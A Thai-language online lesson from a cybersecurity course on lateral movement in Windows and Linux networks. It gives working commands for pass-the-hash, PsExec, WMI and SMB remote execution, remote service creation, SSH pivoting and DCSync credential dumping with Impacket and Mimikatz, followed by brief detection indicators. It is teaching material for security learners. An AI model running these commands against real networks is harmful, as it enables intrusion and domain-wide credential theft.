0Pricing
Cyber Security Academy · บทเรียน

เทคนิคการเคลื่อนที่ภายในเครือข่าย

เคลื่อนที่ผ่านเครือข่ายโดยใช้ WMI, PsExec, WinRM และการแชร์ SMB โดยไม่ก่อให้เกิดการแจ้งเตือน

เทคนิคการเคลื่อนที่ภายในเครือข่าย เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

การเคลื่อนที่ด้านข้างคืออะไร

การเคลื่อนที่ด้านข้าง คือชุดเทคนิคที่ผู้โจมตีใช้เคลื่อนผ่านเครือข่ายอย่างต่อเนื่องหลังจากบุกรุกครั้งแรก — เคลื่อนจากจุดยึดเริ่มต้นไปยังเป้าหมายที่มีมูลค่าสูงกว่า เช่น ตัวควบคุมโดเมน ฐานข้อมูล และระบบสำรองข้อมูล

การส่งต่อแฮช (PtH)

การยืนยันตัวตนของ Windows ด้วย NTLM อนุญาตให้ใช้แฮชของรหัสผ่านโดยตรงแทนรหัสผ่านแบบข้อความธรรมดา ผู้โจมตีที่ดึงแฮช NTLM ออกมาได้สามารถยืนยันตัวตนกับระบบอื่นโดยไม่ต้องถอดรหัสแฮช

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

การส่งต่อตั๋ว (PtT)

ตั๋ว Kerberos (TGT หรือ TGS) สามารถดึงออกจากหน่วยความจำและนำเข้าเพื่อยืนยันตัวตนในฐานะผู้ถือครองตั๋วได้ การโจมตีด้วยตั๋วทองคำปลอมแปลง TGT โดยใช้แฮช KRBTGT ทำให้เข้าถึง Kerberos ในโดเมนได้อย่างไม่จำกัด

การเรียกใช้โค้ดจากระยะไกล: PSExec

psexec (Sysinternals และ Impacket) เรียกใช้คำสั่งบนโฮสต์ Windows ระยะไกลผ่าน SMB หรือการแชร์สำหรับผู้ดูแลระบบ ต้องใช้ข้อมูลประจำตัวของผู้ดูแลระบบ และสร้างไบนารีบริการบนเป้าหมาย

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

การเคลื่อนที่ด้านข้างผ่าน WMI

Windows Management Instrumentation ช่วยให้เรียกใช้โค้ดจากระยะไกลได้โดยไม่ต้องสร้างไฟล์ที่เครื่องมือจำนวนมากสามารถตรวจจับได้:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB และการแชร์สำหรับผู้ดูแลระบบ

การแชร์สำหรับผู้ดูแลระบบของ Windows (C$, ADMIN$, IPC$) ช่วยให้เคลื่อนที่ด้านข้างได้ด้วยข้อมูลประจำตัวของผู้ดูแลระบบ:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

บริการระยะไกล: sc และ at

สร้างบริการหรืองานตามกำหนดเวลาบนระบบระยะไกล:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP และเซสชันแบบโต้ตอบ

RDP (โพรโทคอลเดสก์ท็อประยะไกล พอร์ต 3389) ให้การเข้าถึงแบบโต้ตอบได้อย่างเต็มรูปแบบ ผู้โจมตีใช้ RDP ด้วยข้อมูลประจำตัวที่ขโมยมา การป้องกัน: จำกัด RDP ให้ใช้ได้เฉพาะผ่านเซิร์ฟเวอร์ทางผ่าน กำหนดให้ใช้ NLA และบันทึกทุกเซสชัน

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH ในการเคลื่อนที่ด้านข้าง

ในสภาพแวดล้อมลินุกซ์ ผู้โจมตีใช้ SSH พร้อมคีย์หรือข้อมูลประจำตัวที่ขโมยมาเพื่อเคลื่อนที่ด้านข้าง การใช้การส่งต่อตัวแทนในทางที่ผิดช่วยให้เปลี่ยนเส้นทางผ่านโฮสต์ที่ถูกบุกรุก อุโมงค์ SSH ใช้ส่งต่อพอร์ตเพื่อเข้าถึงระบบที่โดยปกติไม่สามารถเข้าถึงได้

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

การจำลองแบบ Active Directory (DCSync)

DCSync ใช้ประโยชน์จากการจำลองแบบของ AD เพื่อดึงแฮชรหัสผ่านโดยตรงจาก DC โดยไม่ต้องเรียกใช้โค้ดบน DC — ต้องมีสิทธิ์ DS-Replication-Get-Changes-All:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

การตรวจจับการเคลื่อนที่ด้านข้าง

ตัวบ่งชี้สำหรับการตรวจจับ:

  • เหตุการณ์ 4624 (การเข้าสู่ระบบ) ที่มีการเข้าสู่ระบบประเภท 3 (เครือข่าย) ซึ่งผิดปกติ
  • การสร้างบริการบนโฮสต์ระยะไกล (เหตุการณ์ 7045)
  • การเชื่อมต่อ SMB ระหว่างเวิร์กสเตชัน
  • การสร้างกระบวนการ WMI บนโฮสต์ระยะไกล
  • พฤติกรรมบัญชีที่ผิดปกติ (ผู้ใช้เข้าสู่ระบบจากหลายเครื่อง)

ตรวจสอบอย่างรวดเร็ว: การเคลื่อนที่ด้านข้าง

เทคนิคใดที่ช่วยให้ผู้โจมตียืนยันตัวตนกับระบบ Windows โดยใช้แฮช NTLM ที่ดักจับมาโดยไม่ต้องถอดรหัส

สรุปบทเรียน

การเคลื่อนที่ด้านข้างใช้ข้อมูลประจำตัวและโพรโทคอลที่ถูกบุกรุกเพื่อแพร่ผ่านเครือข่าย เทคนิคสำคัญ ได้แก่ การส่งต่อแฮช (นำแฮช NTLM กลับมาใช้) การส่งต่อตั๋ว (Kerberos) การใช้ PSExec, WMI และ SMB เพื่อเรียกใช้โค้ดจากระยะไกล และ DCSync เพื่อเก็บเกี่ยวข้อมูลประจำตัวของโดเมน การตรวจจับ: การเข้าสู่ระบบเครือข่ายที่ผิดปกติ (เหตุการณ์ 4624) การสร้างบริการระยะไกล (เหตุการณ์ 7045) และการรับส่งข้อมูล SMB ระหว่างเวิร์กสเตชัน

คำถามที่พบบ่อย

บทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย”

เคลื่อนที่ผ่านเครือข่ายโดยใช้ WMI, PsExec, WinRM และการแชร์ SMB โดยไม่ก่อให้เกิดการแจ้งเตือน คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน

บทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. เฟรมเวิร์ก C2: Cobalt Strike และ Sliver
  2. ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)
  3. เทคนิคการเคลื่อนที่ภายในเครือข่าย
  4. การเขียนรายงานเรดทีม
← กลับไปที่ Cyber Security Academy